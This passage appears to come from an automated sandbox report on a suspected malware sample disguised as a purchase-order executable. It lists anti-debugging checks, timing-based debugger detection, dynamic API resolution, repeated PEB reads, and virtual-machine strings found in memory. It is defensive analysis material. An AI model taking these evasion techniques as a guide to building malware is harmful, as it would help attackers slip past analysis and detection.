Source: explorer.exe, 00000002.00000000.259579486.0000000008D97000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}October%%
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.253136349.00000000059C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_004086A0 rdtsc 1_2_004086A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00409900 LdrLoadDll, 1_2_00409900
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_013E032D
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf, 0_2_013D7FB0
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD014 mov eax, dword ptr fs:[00000030h] 0_2_013FD014
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD051 mov eax, dword ptr fs:[00000030h] 0_2_013FD051
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FD0B4 mov eax, dword ptr fs:[00000030h] 0_2_013FD0B4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013FC520 mov eax, dword ptr fs:[00000030h] 0_2_013FC520
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F858EC mov eax, dword ptr fs:[00000030h] 1_2_00F858EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h] 1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h] 1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F840E1 mov eax, dword ptr fs:[00000030h] 1_2_00F840E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov ecx, dword ptr fs:[00000030h] 1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h] 1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBF0BF mov eax, dword ptr fs:[00000030h] 1_2_00FBF0BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC90AF mov eax, dword ptr fs:[00000030h] 1_2_00FC90AF
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89080 mov eax, dword ptr fs:[00000030h] 1_2_00F89080
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h] 1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h] 1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h] 1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010449A4 mov eax, dword ptr fs:[00000030h] 1_2_010449A4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010069A6 mov eax, dword ptr fs:[00000030h] 1_2_010069A6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h] 1_2_00FA0050
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA0050 mov eax, dword ptr fs:[00000030h] 1_2_00FA0050
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h] 1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h] 1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h] 1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010051BE mov eax, dword ptr fs:[00000030h] 1_2_010051BE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h] 1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h] 1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h] 1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 mov eax, dword ptr fs:[00000030h] 1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h] 1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h] 1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h] 1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B02A mov eax, dword ptr fs:[00000030h] 1_2_00F9B02A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h] 1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h] 1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h] 1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h] 1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB002D mov eax, dword ptr fs:[00000030h] 1_2_00FB002D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010141E8 mov eax, dword ptr fs:[00000030h] 1_2_010141E8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h] 1_2_01054015
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01054015 mov eax, dword ptr fs:[00000030h] 1_2_01054015
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h] 1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h] 1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01007016 mov eax, dword ptr fs:[00000030h] 1_2_01007016
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B1E1 mov eax, dword ptr fs:[00000030h] 1_2_00F8B1E1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB61A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB61A0 mov eax, dword ptr fs:[00000030h] 1_2_00FB61A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2990 mov eax, dword ptr fs:[00000030h] 1_2_00FB2990
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01051074 mov eax, dword ptr fs:[00000030h] 1_2_01051074
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01042073 mov eax, dword ptr fs:[00000030h] 1_2_01042073
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAC182 mov eax, dword ptr fs:[00000030h] 1_2_00FAC182
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA185 mov eax, dword ptr fs:[00000030h] 1_2_00FBA185
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h] 1_2_01003884
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003884 mov eax, dword ptr fs:[00000030h] 1_2_01003884
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h] 1_2_00F8B171
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8B171 mov eax, dword ptr fs:[00000030h] 1_2_00F8B171
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8C962 mov eax, dword ptr fs:[00000030h] 1_2_00F8C962
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h] 1_2_00FAB944
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAB944 mov eax, dword ptr fs:[00000030h] 1_2_00FAB944
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h] 1_2_00FB513A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB513A mov eax, dword ptr fs:[00000030h] 1_2_00FB513A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov ecx, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0101B8D0 mov eax, dword ptr fs:[00000030h] 1_2_0101B8D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h] 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h] 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h] 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov eax, dword ptr fs:[00000030h] 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 mov ecx, dword ptr fs:[00000030h] 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h] 1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h] 1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89100 mov eax, dword ptr fs:[00000030h] 1_2_00F89100
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104131B mov eax, dword ptr fs:[00000030h] 1_2_0104131B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2AE4 mov eax, dword ptr fs:[00000030h] 1_2_00FB2AE4
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2ACB mov eax, dword ptr fs:[00000030h] 1_2_00FB2ACB
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00F9AAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00F9AAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBFAB0 mov eax, dword ptr fs:[00000030h] 1_2_00FBFAB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058B58 mov eax, dword ptr fs:[00000030h] 1_2_01058B58
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h] 1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h] 1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h] 1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h] 1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F852A5 mov eax, dword ptr fs:[00000030h] 1_2_00F852A5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h] 1_2_00FBD294
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBD294 mov eax, dword ptr fs:[00000030h] 1_2_00FBD294
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103D380 mov ecx, dword ptr fs:[00000030h] 1_2_0103D380
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC927A mov eax, dword ptr fs:[00000030h] 1_2_00FC927A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104138A mov eax, dword ptr fs:[00000030h] 1_2_0104138A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01055BA5 mov eax, dword ptr fs:[00000030h] 1_2_01055BA5
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h] 1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h] 1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h] 1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F89240 mov eax, dword ptr fs:[00000030h] 1_2_00F89240
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h] 1_2_010053CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010053CA mov eax, dword ptr fs:[00000030h] 1_2_010053CA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h] 1_2_00FC4A2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC4A2C mov eax, dword ptr fs:[00000030h] 1_2_00FC4A2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA229 mov eax, dword ptr fs:[00000030h] 1_2_00FAA229
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA3A1C mov eax, dword ptr fs:[00000030h] 1_2_00FA3A1C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h] 1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov ecx, dword ptr fs:[00000030h] 1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h] 1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F85210 mov eax, dword ptr fs:[00000030h] 1_2_00F85210
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00F8AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8AA16 mov eax, dword ptr fs:[00000030h] 1_2_00F8AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F98A0A mov eax, dword ptr fs:[00000030h] 1_2_00F98A0A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h] 1_2_0104AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104AA16 mov eax, dword ptr fs:[00000030h] 1_2_0104AA16
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FADBE9 mov eax, dword ptr fs:[00000030h] 1_2_00FADBE9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB03E2 mov eax, dword ptr fs:[00000030h] 1_2_00FB03E2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104EA55 mov eax, dword ptr fs:[00000030h] 1_2_0104EA55
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01014257 mov eax, dword ptr fs:[00000030h] 1_2_01014257
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB4BAD mov eax, dword ptr fs:[00000030h] 1_2_00FB4BAD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h] 1_2_0103B260
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103B260 mov eax, dword ptr fs:[00000030h] 1_2_0103B260
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058A62 mov eax, dword ptr fs:[00000030h] 1_2_01058A62
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBB390 mov eax, dword ptr fs:[00000030h] 1_2_00FBB390
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2397 mov eax, dword ptr fs:[00000030h] 1_2_00FB2397
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h] 1_2_00F91B8F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F91B8F mov eax, dword ptr fs:[00000030h] 1_2_00F91B8F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h] 1_2_00FB3B7A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB3B7A mov eax, dword ptr fs:[00000030h] 1_2_00FB3B7A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8DB60 mov ecx, dword ptr fs:[00000030h] 1_2_00F8DB60
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8F358 mov eax, dword ptr fs:[00000030h] 1_2_00F8F358
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8DB40 mov eax, dword ptr fs:[00000030h] 1_2_00F8DB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01058D34 mov eax, dword ptr fs:[00000030h] 1_2_01058D34
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0100A537 mov eax, dword ptr fs:[00000030h] 1_2_0100A537
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104E539 mov eax, dword ptr fs:[00000030h] 1_2_0104E539
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01003540 mov eax, dword ptr fs:[00000030h] 1_2_01003540
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01033D40 mov eax, dword ptr fs:[00000030h] 1_2_01033D40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9849B mov eax, dword ptr fs:[00000030h] 1_2_00F9849B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA746D mov eax, dword ptr fs:[00000030h] 1_2_00FA746D
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h] 1_2_010505AC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010505AC mov eax, dword ptr fs:[00000030h] 1_2_010505AC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBA44B mov eax, dword ptr fs:[00000030h] 1_2_00FBA44B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov ecx, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01006DC9 mov eax, dword ptr fs:[00000030h] 1_2_01006DC9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBBC2C mov eax, dword ptr fs:[00000030h] 1_2_00FBBC2C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h] 1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h] 1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h] 1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104FDE2 mov eax, dword ptr fs:[00000030h] 1_2_0104FDE2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01038DF1 mov eax, dword ptr fs:[00000030h] 1_2_01038DF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041C06 mov eax, dword ptr fs:[00000030h] 1_2_01041C06
